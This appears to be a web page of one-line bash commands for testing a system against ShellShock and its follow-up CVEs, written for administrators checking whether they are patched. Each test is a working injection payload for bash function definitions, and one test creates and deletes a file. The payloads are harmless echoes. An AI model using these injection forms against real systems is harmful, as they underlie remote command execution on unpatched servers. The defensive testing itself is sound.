How to test for Bash ShellShock
If you want to test each exploit individually without running the script above, feel free! They are listed below.
Exploit 1 (CVE-2014-6271)
There are a few different ways to test if your system is vulnerable to shellshock. Try running the following command in a shell.
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If you see "vulnerable" you need to update bash. Otherwise, you should be good to go.
Exploit 2 (CVE-2014-7169)
Even after upgrading bash you may still be vulnerable to this exploit. Try running the following code.
env X='() { (shellshocker.net)=>\' bash -c "echo date"; cat echo; rm ./echo
If the above command outputs the current date (it may also show errors), you are still vulnerable.
Exploit 3 (???)
Here is another variation of the exploit. Please leave a comment below if you know the CVE of this exploit.
env X=' () { }; echo hello' bash -c 'date'
If the above command outputs "hello", you are vulnerable.
Exploit 4 (CVE-2014-7186)
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"
A vulnerable system will echo the text "CVE-2014-7186 vulnerable, redir_stack".
Exploit 5 (CVE-2014-7187)
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"
A vulnerable system will echo the text "CVE-2014-7187 vulnerable, word_lineno".
Exploit 6 (CVE-2014-6278)
shellshocker='() { echo You are vulnerable; }' bash -c shellshocker
You shouldn't see "You are vulnerable", if you're patched you will see "bash: shellshocker: command not found"
Exploit 7 (CVE-2014-6277)
bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable
If the command outputs "vulnerable", you are vulnerable.
If you've tested your system, please leave a comment below. Don't forget to include your bash version and what OS you're running. Type bash --version
for bash, and cat /etc/*release*
for your OS.
---------------------------------------------------------------------------------
To check for the CVE-2014-6271 vulnerability
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
it should NOT echo back the word vulnerable.
To check for the CVE-2014-7169 vulnerability
(warning: if yours fails it will make or overwrite a file called /tmp/echo that you can delete after, and need to delete before testing again )
cd /tmp; env X='() { (a)=>\' bash -c "echo date"; cat echo
it should say the word date then complain with a message like cat: echo: No such file or directory. If instead it tells you what the current datetime is then your system is vulnerable.
To check for CVE-2014-7186
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF'
|| echo "CVE-2014-7186 vulnerable, redir_stack"
it should NOT echo back the text CVE-2014-7186 vulnerable, redir_stack.
To check for CVE-2014-7187
(for x in
{1..200}
;
do echo "for x$x in ; do :";
done;
for x in
{1..200}
;
do echo done
;
done)
| bash || echo "CVE-2014-7187 vulnerable, word_lineno"
it should NOT echo back the text CVE-2014-7187 vulnerable, word_lineno.